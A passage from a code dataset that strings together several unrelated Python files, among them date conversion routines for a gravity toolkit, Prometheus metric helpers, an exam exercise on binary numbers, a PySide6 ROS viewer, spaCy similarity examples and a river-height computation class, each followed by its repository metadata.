cal_date['year'] = np.zeros((n_dates))\n cal_date['month'] = np.zeros((n_dates))\n cal_date['day'] = np.zeros((n_dates))\n cal_date['hour'] = np.zeros((n_dates))\n cal_date['minute'] = np.zeros((n_dates))\n cal_date['second'] = np.zeros((n_dates))\n #-- day of the year\n cal_date['DofY'] = np.zeros((n_dates))\n\n #-- remove singleton dimensions and use year and month\n cal_date['year'][:] = np.squeeze(year)\n cal_date['month'][:] = np.squeeze(month)\n\n #-- create output date variable\n t_date = np.zeros((n_dates))\n\n #-- days per month in a leap and a standard year\n #-- only difference is February (29 vs. 28)\n dpm_leap=np.array([31,29,31,30,31,30,31,31,30,31,30,31], dtype=np.float64)\n dpm_stnd=np.array([31,28,31,30,31,30,31,31,30,31,30,31], dtype=np.float64)\n\n #-- Rules in the Gregorian calendar for a year to be a leap year:\n #-- divisible by 4, but not by 100 unless divisible by 400\n #-- True length of the year is about 365.2422 days\n #-- Adding a leap day every four years ==> average 365.25\n #-- Subtracting a leap year every 100 years ==> average 365.24\n #-- Adding a leap year back every 400 years ==> average 365.2425\n #-- Subtracting a leap year every 4000 years ==> average 365.24225\n m4 = (cal_date['year'] % 4)\n m100 = (cal_date['year'] % 100)\n m400 = (cal_date['year'] % 400)\n m4000 = (cal_date['year'] % 4000)\n #-- find indices for standard years and leap years using criteria\n leap, = np.nonzero((m4 == 0) & (m100 != 0) | (m400 == 0) & (m4000 != 0))\n stnd, = np.nonzero((m4 != 0) | (m100 == 0) & (m400 != 0) | (m4000 == 0))\n\n #-- calculate the day of the year\n if DofY is not None:\n #-- if entered directly as an input\n #-- remove 1 so day 1 (Jan 1st) = 0.0 in decimal format\n cal_date['DofY'][:] = np.squeeze(DofY)-1\n else:\n #-- use calendar month and day of the month to calculate day of the year\n #-- month minus 1: January = 0, February = 1, etc (indice of month)\n #-- in decimal form: January = 0.0\n month_m1 = np.array(cal_date['month'],dtype=np.int64) - 1\n\n #-- day of month\n if day is not None:\n #-- remove 1 so 1st day of month = 0.0 in decimal format\n cal_date['day'][:] = np.squeeze(day)-1.0\n else:\n #-- if not entering days as an input\n #-- will use the mid-month value\n cal_date['day'][leap] = dpm_leap[month_m1[leap]]/2.0\n cal_date['day'][stnd] = dpm_stnd[month_m1[stnd]]/2.0\n\n #-- create matrix with the lower half = 1\n #-- this matrix will be used in a matrix multiplication\n #-- to calculate the total number of days for prior months\n #-- the -1 will make the diagonal == 0\n #-- i.e. first row == all zeros and the\n #-- last row == ones for all but the last element\n mon_mat=np.tri(12,12,-1)\n #-- using a dot product to calculate total number of days\n #-- for the months before the input date\n #-- basically is sum(i*dpm)\n #-- where i is 1 for all months < the month of interest\n #-- and i is 0 for all months >= the month of interest\n #-- month of interest is zero as the exact days will be\n #-- used to calculate the date\n\n #-- calculate the day of the year for leap and standard\n #-- use total days of all months before date\n #-- and add number of days before date in month\n cal_date['DofY'][stnd] = cal_date['day'][stnd] + \\\n np.dot(mon_mat[month_m1[stnd],:],dpm_stnd)\n cal_date['DofY'][leap] = cal_date['day'][leap] + \\\n np.dot(mon_mat[month_m1[leap],:],dpm_leap)\n\n #-- hour of day (else is zero)\n if hour is not None:\n cal_date['hour'][:] = np.squeeze(hour)\n\n #-- minute of hour (else is zero)\n if minute is not None:\n cal_date['minute'][:] = np.squeeze(minute)\n\n #-- second in minute (else is zero)\n if second is not None:\n cal_date['second'][:] = np.squeeze(second)\n\n #-- calculate decimal date\n #-- convert hours, minutes and seconds into days\n #-- convert calculated fractional days into decimal fractions of the year\n #-- Leap years\n t_date[leap] = cal_date['year'][leap] + \\\n (cal_date['DofY'][leap] + cal_date['hour'][leap]/24. + \\\n cal_date['minute'][leap]/1440. + \\\n cal_date['second'][leap]/86400.)/np.sum(dpm_leap)\n #-- Standard years\n t_date[stnd] = cal_date['year'][stnd] + \\\n (cal_date['DofY'][stnd] + cal_date['hour'][stnd]/24. + \\\n cal_date['minute'][stnd]/1440. + \\\n cal_date['second'][stnd]/86400.)/np.sum(dpm_stnd)\n\n return t_date\n\n#-- PURPOSE: Converts from Julian day to calendar date and time\ndef convert_julian(JD, ASTYPE=None, FORMAT='dict'):\n \"\"\"\n Converts from Julian day to calendar date and time\n\n Translated from caldat in \"Numerical Recipes in C\", by William H. Press,\n Brian P. Flannery, Saul A. Teukolsky, and William T. Vetterling.\n Cambridge University Press, 1988 (second printing).\n Hatcher, D. A., \"Simple Formulae for Julian Day Numbers and Calendar Dates\",\n Quarterly Journal of the Royal Astronomical Society, 25(1), 1984.\n\n\n Arguments\n ---------\n JD: Julian Day (days since 01-01-4713 BCE at 12:00:00)\n\n Keyword arguments\n -----------------\n ASTYPE: convert output to variable type\n FORMAT: format of output variables\n 'dict': dictionary with variable keys\n 'tuple': tuple with variable order YEAR,MONTH,DAY,HOUR,MINUTE,SECOND\n 'zip': aggregated variable sets\n\n Returns\n -------\n year: calendar year\n month: calendar month\n day: day of the month\n hour: hour of the day\n minute: minute of the hour\n second: second of the minute\n \"\"\"\n\n #-- convert to array if only a single value was imported\n if (np.ndim(JD) == 0):\n JD = np.atleast_1d(JD)\n SINGLE_VALUE = True\n else:\n SINGLE_VALUE = False\n\n JDO = np.floor(JD + 0.5)\n C = np.zeros_like(JD)\n #-- calculate C for dates before and after the switch to Gregorian\n IGREG = 2299161.0\n ind1, = np.nonzero(JDO < IGREG)\n C[ind1] = JDO[ind1] + 1524.0\n ind2, = np.nonzero(JDO >= IGREG)\n B = np.floor((JDO[ind2] - 1867216.25)/36524.25)\n C[ind2] = JDO[ind2] + B - np.floor(B/4.0) + 1525.0\n #-- calculate coefficients for date conversion\n D = np.floor((C - 122.1)/365.25)\n E = np.floor((365.0 * D) + np.floor(D/4.0))\n F = np.floor((C - E)/30.6001)\n #-- calculate day, month, year and hour\n DAY = np.floor(C - E + 0.5) - np.floor(30.6001*F)\n MONTH = F - 1.0 - 12.0*np.floor(F/14.0)\n YEAR = D - 4715.0 - np.floor((7.0+MONTH)/10.0)\n HOUR = np.floor(24.0*(JD + 0.5 - JDO))\n #-- calculate minute and second\n G = (JD + 0.5 - JDO) - HOUR/24.0\n MINUTE = np.floor(G*1440.0)\n SECOND = (G - MINUTE/1440.0) * 86400.0\n\n #-- convert all variables to output type (from float)\n if ASTYPE is not None:\n YEAR = YEAR.astype(ASTYPE)\n MONTH = MONTH.astype(ASTYPE)\n DAY = DAY.astype(ASTYPE)\n HOUR = HOUR.astype(ASTYPE)\n MINUTE = MINUTE.astype(ASTYPE)\n SECOND = SECOND.astype(ASTYPE)\n\n #-- if only a single value was imported initially: remove singleton dims\n if SINGLE_VALUE:\n YEAR = YEAR.item(0)\n MONTH = MONTH.item(0)\n DAY = DAY.item(0)\n HOUR = HOUR.item(0)\n MINUTE = MINUTE.item(0)\n SECOND = SECOND.item(0)\n\n #-- return date variables in output format (default python dictionary)\n if (FORMAT == 'dict'):\n return dict(year=YEAR, month=MONTH, day=DAY,\n hour=HOUR, minute=MINUTE, second=SECOND)\n elif (FORMAT == 'tuple'):\n return (YEAR, MONTH, DAY, HOUR, MINUTE, SECOND)\n elif (FORMAT == 'zip'):\n return zip(YEAR, MONTH, DAY, HOUR, MINUTE, SECOND)\n", "repo_name": "geodeepak/GRACE_HYDL", "sub_path": "gravity_toolkit/time.py", "file_name": "time.py", "file_ext": "py", "file_size_in_byte": 19484, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dateutil.parser.parser.parse", "line_number": 45, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 45, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 45, "usage_type": "name"}, {"api_name": "dateutil.parser.parser.parse", "line_number": 81, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 81, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 81, "usage_type": "name"}, {"api_name": "numpy.atleast_1d", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 150, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 209, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 227, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 228, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 261, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 294, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 296, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 298, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 299, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 302, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 302, "usage_type": "attribute"}, {"api_name": "numpy.atleast_1d", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 337, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 338, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 339, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 340, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 341, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 355, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 356, "usage_type": "attribute"}, {"api_name": "numpy.nonzero", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 382, "usage_type": "attribute"}, {"api_name": "numpy.squeeze", "line_number": 387, "usage_type": "call"}, {"api_name": "numpy.tri", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 413, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 419, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 436, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 441, "usage_type": "call"}, {"api_name": "numpy.ndim", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.atleast_1d", "line_number": 481, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 486, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 487, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 490, "usage_type": "call"}, {"api_name": "numpy.nonzero", "line_number": 492, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 493, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 494, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 496, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 497, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 498, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 500, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 501, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 502, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 503, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 506, "usage_type": "call"}]} +{"seq_id": "26526599687", "text": "import time\nimport socket\nfrom functools import wraps\n\nfrom prometheus_client import Gauge, Histogram, Counter\n\n\nHOST_NAME = socket.gethostname()\n\n\ndef setup_histogram(*histograms):\n def wrapper(func):\n @wraps(func)\n def _wrapper(*args, **kwargs):\n start = time.time()\n try:\n return func(*args, **kwargs)\n finally:\n for h in histograms:\n h.labels(hostname=HOST_NAME).observe(time.time() - start)\n\n return _wrapper\n\n return wrapper\n\n\ndef setup_counter(*counters):\n def wrapper(func):\n @wraps(func)\n def _wrapper(*args, **kwargs):\n for c in counters:\n c.inc(1)\n return func(*args, **kwargs)\n\n return _wrapper\n\n return wrapper\n\n\n# taskflow metrics\nTASKFLOW_TIMEOUT_NODES_NUMBER = Gauge(\n \"taskflow_timeout_nodes_number\", \"amount of timeout nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_RUNNING_NODES_NUMBER = Gauge(\n \"taskflow_running_nodes_number\", \"amount of running nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_TIMEOUT_NODES_SCANNING_TIME = Histogram(\n \"taskflow_timeout_nodes_scanning_time\", \"time to scan timeout nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_TIMEOUT_NODES_PROCESSING_TIME = Histogram(\n \"taskflow_timeout_nodes_processing_time\", \"time to process timeout nodes\", labelnames=[\"hostname\"]\n)\nTASKFLOW_NODE_AUTO_RETRY_TASK_DURATION = Histogram(\n \"taskflow_node_auto_retry_task_duration\", \"time to process node auto retry task\", labelnames=[\"hostname\"]\n)\nTASKFLOW_NODE_AUTO_RETRY_LOCK_ACCUIRE_FAIL = Counter(\n \"taskflow_node_auto_retry_lock_accuire_fail\", \"node auto retry lock fetch fail count\", labelnames=[\"hostname\"]\n)\n", "repo_name": "TencentBlueKing/bk-sops", "sub_path": "metrics.py", "file_name": "metrics.py", "file_ext": "py", "file_size_in_byte": 1718, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1001, "dataset": "github-code", "pt": "53", "api": [{"api_name": "socket.gethostname", "line_number": 8, "usage_type": "call"}, {"api_name": "time.time", "line_number": 15, "usage_type": "call"}, {"api_name": "time.time", "line_number": 20, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 13, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 29, "usage_type": "call"}, {"api_name": "prometheus_client.Gauge", "line_number": 41, "usage_type": "call"}, {"api_name": "prometheus_client.Gauge", "line_number": 44, "usage_type": "call"}, {"api_name": "prometheus_client.Histogram", "line_number": 47, "usage_type": "call"}, {"api_name": "prometheus_client.Histogram", "line_number": 50, "usage_type": "call"}, {"api_name": "prometheus_client.Histogram", "line_number": 53, "usage_type": "call"}, {"api_name": "prometheus_client.Counter", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "19812397452", "text": "# Arkusz: https://cke.gov.pl/images/_EGZAMIN_MATURALNY_OD_2015/Arkusze_egzaminacyjne/2015/formula_od_2015/MIN-R2_1P-152.pdf\n# Wyniki: https://cke.gov.pl/images/_EGZAMIN_MATURALNY_OD_2015/Arkusze_egzaminacyjne/2015/formula_od_2015/odpowiedzi/MIN-R1-N.pdf\nfrom collections import Counter\n\n\ndef wczytaj(nazwa):\n with open(nazwa) as plik:\n # return list(map(str.strip, plik)) # SKRÓTOWIEC\n\n wynik = []\n for linia in plik:\n wynik.append(linia.strip())\n return wynik\n\n\ndef przezerowane(liczby):\n # return sum(1 for i in liczby if Counter(i).most_common(1)[0][0] == '0') # SKRÓTOWIEC\n\n suma = 0\n for i in liczby:\n if Counter(i).most_common(1)[0][0] == \"0\":\n suma += 1\n return suma\n\n\ndef podzielne(liczby):\n przez_2 = 0\n przez_8 = 0\n for liczba in liczby:\n if liczba[-1] == \"0\":\n przez_2 += 1\n if liczba[-3:] == \"000\":\n przez_8 += 1\n\n return {\"2\": przez_2, \"8\": przez_8}\n\n\ndef gdzie_minmax(liczby):\n # algorytmicznie suboptymalne, ale bardziej idiomatyczne\n pomocnik = [int(i, 2) for i in liczby]\n gdzie_min = pomocnik.index(min(pomocnik))\n gdzie_max = pomocnik.index(max(pomocnik))\n return gdzie_min, gdzie_max\n\n\nif __name__ == \"__main__\":\n liczby = wczytaj(\"liczby.txt\")\n\n wynik = podzielne(liczby)\n gdzie_min, gdzie_max = gdzie_minmax(liczby)\n\n print(f\"Liczb mających więcej zer niż jedynek: {przezerowane(liczby)}.\")\n print(f\"Liczb podzielnych przez 2: {wynik['2']}.\")\n print(f\"Liczb podzielnych przez 8: {wynik['8']}.\")\n print(\n f\"Najmniejsza liczba znajduje się w wierszu {gdzie_min + 1}\"\n ) # bo w życiu liczymy od 1\n print(f\"Największa liczba znajduje się w wierszu {gdzie_max + 1}\")\n", "repo_name": "dekoza/pymatura", "sub_path": "N_2015/zad4.py", "file_name": "zad4.py", "file_ext": "py", "file_size_in_byte": 1765, "program_lang": "python", "lang": "pl", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.Counter", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "31287668350", "text": "import sys\nimport os\n\nfrom PySide6.QtCore import QUrl, Signal\nfrom PySide6.QtWidgets import QApplication, QMainWindow\nfrom PySide6.QtWebChannel import QWebChannel\nfrom PySide6.QtWebEngineWidgets import QWebEngineView\n\nfrom .ros_handler import ROS2Thread, SignalHandler\nfrom .backend import Backend\n\nclass MainWindow(QMainWindow):\n def __init__(self) -> None:\n super().__init__()\n\n self.setWindowTitle('ROSTron Viewer')\n\n # Field\n self.web = QWebEngineView(self)\n self.channel = QWebChannel()\n self.web.page().setWebChannel(self.channel)\n self.backend = Backend()\n self.channel.registerObject(\"backend\", self.backend)\n\n url = QUrl.fromLocalFile(os.path.join(\n os.path.dirname(__file__), \"index.html\"))\n self.web.load(url)\n self.setCentralWidget(self.web)\n\n # ROS2 Thread\n self.ros_thread = ROS2Thread(parent=self)\n self.ros_thread.start()\n\n # Signal Handler\n SignalHandler().field.connect(self.backend.set_field)\n SignalHandler().ball.connect(self.backend.set_ball)\n SignalHandler().yellow.connect(self.backend.set_yellow)\n SignalHandler().allies.connect(self.backend.set_allies)\n SignalHandler().opponents.connect(self.backend.set_opponents)\n SignalHandler().add_annotation.connect(self.backend.add_annotation)\n SignalHandler().del_annotation.connect(self.backend.del_annotation)\n\n\n\ndef main():\n app = QApplication(sys.argv)\n w = MainWindow()\n w.showMaximized()\n app.exec()\n", "repo_name": "NAELIC/rostron_viewer", "sub_path": "rostron_viewer/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1554, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PySide6.QtWidgets.QMainWindow", "line_number": 12, "usage_type": "name"}, {"api_name": "PySide6.QtWebEngineWidgets.QWebEngineView", "line_number": 19, "usage_type": "call"}, {"api_name": "PySide6.QtWebChannel.QWebChannel", "line_number": 20, "usage_type": "call"}, {"api_name": "backend.Backend", "line_number": 22, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QUrl.fromLocalFile", "line_number": 25, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QUrl", "line_number": 25, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ros_handler.ROS2Thread", "line_number": 31, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 35, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 36, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 37, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 38, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 39, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 40, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 41, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QApplication", "line_number": 46, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 46, "usage_type": "attribute"}]} +{"seq_id": "35849913772", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 22 17:14:46 2019\n\n@author: Josh\n\"\"\"\n\n#Similarity examples (1)\n\nimport spacy\n\nnlp = spacy.load('en_core_web_md')\n\n#Compare two documents\ndoc1 = nlp(\"I like fast food\")\ndoc2 = nlp(\"I like pizza\")\nprint(doc1.similarity(doc2))\n\n#Compare two tokens\ndoc = nlp(\"I like pizza and pasta\")\ntoken1 = doc[2]\ntoken2 = doc[4]\nprint(token1.similarity(token2))\n\n#Similarity examples (2)\n\n#Compare a document with a token\ndoc = nlp(\"I like pizza\")\ntoken = nlp(\"soap\")[0]\n\nprint(doc.similarity(token))\n\n#Compare a span with a document\nspan = nlp(\"I like pizza and pasta\")[2:5]\ndoc = nlp(\"McDonalds sells burgers\")\n\nprint(span.similarity(doc))\n\n#Word vectors in spaCy\n\ndoc = nlp(\"I have a banana\")\n#Access the vector via the token.vector attribute\nprint(doc[3].vector)\n\n#Similarity depends on the application context\n\ndoc1 = nlp(\"I like cats\")\ndoc2 = nlp(\"I hate cats\")\n\nprint(doc1.similarity(doc2))", "repo_name": "joshuagladwin/Advanced-NLP-with-spaCy", "sub_path": "Chapter 2 - Large-scale data analysis with spaCy/8 - Word vector and semantic similarities.py", "file_name": "8 - Word vector and semantic similarities.py", "file_ext": "py", "file_size_in_byte": 927, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "spacy.load", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "1975467335", "text": "import WaterShed\n\nimport pandas as pd\nimport numpy as np\nfrom numpy import unravel_index\nimport pytz\nfrom datetime import datetime\nimport networkx as nx\nfrom tqdm import tqdm\nfrom os import path\nimport os\n\n\n\nclass Graph():\n\n def __init__(self, dem=None, fdir=None, acc=None, compression=1):\n self.dem = dem\n self.fdir = fdir\n self.acc = acc\n self.compression = compression\n self.point_size_meteres = 35\n\n\n def compute_height(self, file_path, DEMs_path, min_acc, save_path):\n df = pd.read_csv(file_path, sep=';', decimal=',')\n df['x_lon_int'] = df['x_lon'].values.astype(int)\n df['y_lat_int'] = df['y_lat'].values.astype(int)\n \n # Sort df by x_lon and y_lat for future reduction of DEM computing\n df.sort_values(['x_lon_int', 'y_lat_int'], axis = 0, ascending = True, inplace = True, na_position = \"first\")\n \n dt_string = datetime.now(pytz.timezone('Europe/Moscow')).strftime(\"%d_%m_%Y__%H:%M\")\n self.df_new = pd.DataFrame(columns=['hstation_id', 'x_lon', 'y_lat', 'height', 'distance_m', 'error'])\n self.df_new = self.df_new.astype(dtype= {'hstation_id':'int64', 'height':'int64', 'distance_m':'int64', 'error':'int64'})\n x_lon_past, y_lat_past = None, None\n\n for i, row in df.iterrows():\n print(f'{i+1}/{df.shape[0]} hydropost...')\n hstation_id = int(row[0])\n x_lon, y_lat = row[1], row[2]\n coordinate = (x_lon, y_lat)\n\n # Define coordinate of map to download \n lng_num, lat_num = int(x_lon), int(y_lat)\n\n # Check if this coordinates weren't calculated\n if (x_lon_past != lng_num) or (y_lat_past != lat_num):\n x_lon_past, y_lat_past = lng_num, lat_num\n # Set acc values as None to calulate them later\n self.acc_slice = None\n self.acc_Graph = None\n \n if lat_num+1 < 60:\n self.point_size_meteres = 35\n self.compression = 2\n else:\n self.point_size_meteres = 65\n self.compression = 1\n\n self.tif_pathes = []\n for i in range(lat_num-1, lat_num+2):\n for j in range(lng_num-1, lng_num+2):\n lat = str(i)\n lng = ''.join((['0'] + list(str(int(j))))[-3:])\n file_name = f'n{lat}_e{lng}_1arc_v3.tif' if lat_num+1 < 60 else f'n{lat}_e{lng}_1arc_v3_1201x1201.tif'\n self.tif_pathes.append(f'{DEMs_path}/{file_name}')\n \n # check if files 'exisits'\n success_list = []\n for tif_path in self.tif_pathes:\n if path.exists(tif_path) == False:\n print(f'{tif_path} is not exist in path {DEMs_path}')\n success_list.append(False)\n\n # Download DEM and preprocess it\n if len(success_list) == 0:\n print('All required DEMs exist')\n self.compute_DEM(self.tif_pathes, lng_num, lat_num, compression=self.compression)\n else:\n # Temporary while I'm thinking what to with others frames DEMs\n print('Not all required DEMs exist')\n self.compression = 1\n self.acc = None\n self.dem = None\n self.fdir = None\n \n\n # Calculate Heights\n top_left = (lng_num-1, lat_num+2) if len(self.tif_pathes) == 9 else (lng_num, lat_num+1)\n bottom_right = (lng_num+2, lat_num-1) if len(self.tif_pathes) == 9 else (lng_num+1, lat_num)\n\n if self.dem is not None:\n height, distance, success = self.compute_height_differance(coordinate, top_left, bottom_right, 10000, min_acc)\n error = 1 if success == False else 0\n\n dct = {\n 'hstation_id': hstation_id, \n 'x_lon': x_lon, \n 'y_lat': y_lat, \n 'height': int(height),\n 'distance_m': int(distance),\n 'error': int(error)\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{dt_string}_hydroposts_height_calculated.csv', sep=';', decimal=',', index=False)\n else:\n # here is save for error hydropost (corner hydropost without all DEMs)\n dct = {\n 'hstation_id': hstation_id, \n 'x_lon': x_lon, \n 'y_lat': y_lat, \n 'height': 0,\n 'distance_m': 0,\n 'error': 1\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{dt_string}_hydroposts_height_calculated.csv', sep=';', decimal=',', index=False)\n\n \n\n def compute_DEM(self, pathes, lng_num, lat_num, compression=3):\n if len(pathes) == 9:\n shed = WaterShed.WaterSheds(files_pathes=pathes, compute_acc=True, compression=compression)\n self.compression = compression\n self.acc = shed.acc\n self.dem = shed.dem\n self.fdir = shed.fdir\n else:\n # Use only central tile\n lat = str(lat_num)\n lng = ''.join((['0'] + list(str(int(lng_num))))[-3:])\n shed = WaterShed.WaterSheds(file_path=f'n{lat}_e{lng}_1arc_v3.tif', compute_acc=True)\n self.compression = compression\n self.acc = shed.acc\n self.dem = shed.dem\n self.fdir = shed.fdir\n\n\n def compute_height_differance(self, coordinate, top_left, bottom_right, lenth, min_acc):\n # In case to not create acc_graph every time for same lon & lat\n if (self.acc_slice is None) or (self.acc_Graph is None):\n acc_slice = self.acc.copy()\n # Filter river cells\n self.create_acc_graph(acc_slice, self.fdir, min_acc)\n\n point = self.coordinate2point(coordinate, top_left, bottom_right)\n river_pathes_nodes_DOWN, river_pathes_nodes_UP, distance, success = self.compute_river_path(point, lenth)\n\n start, end = river_pathes_nodes_DOWN[-1], river_pathes_nodes_UP[-1]\n start_height, end_height = self.dem[start], self.dem[end]\n return abs(start_height - end_height), distance, success\n\n\n def compute_river_path(self, point, lenth):\n \"\"\"\n Function returns all river nodes down and up from the given point.\n * lenth - in meteres from start to up and down.\n \"\"\"\n point_lenth = self.compression * self.point_size_meteres # around 35 meteres shape for each point\n\n # DOWN\n river_pathes_lenght_DOWN = int(lenth/point_lenth) # количество затопленных клеток реки вниз по течению\n river_pathes_nodes_DOWN = [point] # Стартовая точка тоже входит.\n node = point\n for _ in tqdm(range(river_pathes_lenght_DOWN)):\n try:\n new_node = self.out_node(node)\n river_pathes_nodes_DOWN.append(new_node)\n node = new_node\n except:\n print(f\"Out nodes not definded.\\nLast node: {river_pathes_nodes_DOWN[-1]}\\nCollected {len(river_pathes_nodes_DOWN)} nodes\")\n break\n \n # UP\n river_pathes_lenght_UP = int(lenth/point_lenth) # количество затопленных клеток реки вверх по течению\n river_pathes_nodes_UP = [point] # Стартовая точка тоже входит.\n node = point\n for _ in tqdm(range(river_pathes_lenght_UP)):\n try:\n new_node = self.in_node(node)\n river_pathes_nodes_UP.append(new_node)\n node = new_node\n except:\n print(f\"Out nodes not definded.\\nLast node: {river_pathes_nodes_UP[-1]}\\nCollected {len(river_pathes_nodes_UP)} nodes\")\n break\n \n distance = (len(river_pathes_nodes_DOWN) + len(river_pathes_nodes_UP)) * point_lenth\n success = True if (len(river_pathes_nodes_DOWN) == river_pathes_lenght_DOWN + 1) and (len(river_pathes_nodes_UP) > (0.5*river_pathes_lenght_UP)) else False\n return river_pathes_nodes_DOWN, river_pathes_nodes_UP, distance, success\n\n\n def coordinate2point(self, coordinate, top_left, bottom_right):\n # lng - horizontal, lat - vertical\n # shape[0] - vertical \n # shape[1] - horizontal\n lng, lat = coordinate\n lng_left, lng_right = top_left[0], bottom_right[0]\n lat_top, lat_bottom = top_left[1], bottom_right[1]\n lng = abs(lng_left - lng) / abs(lng_left - lng_right)\n lat = 1 - (abs(lat_bottom - lat) / abs(lat_top - lat_bottom))\n\n x_path, y_path = 1/self.dem.shape[1], 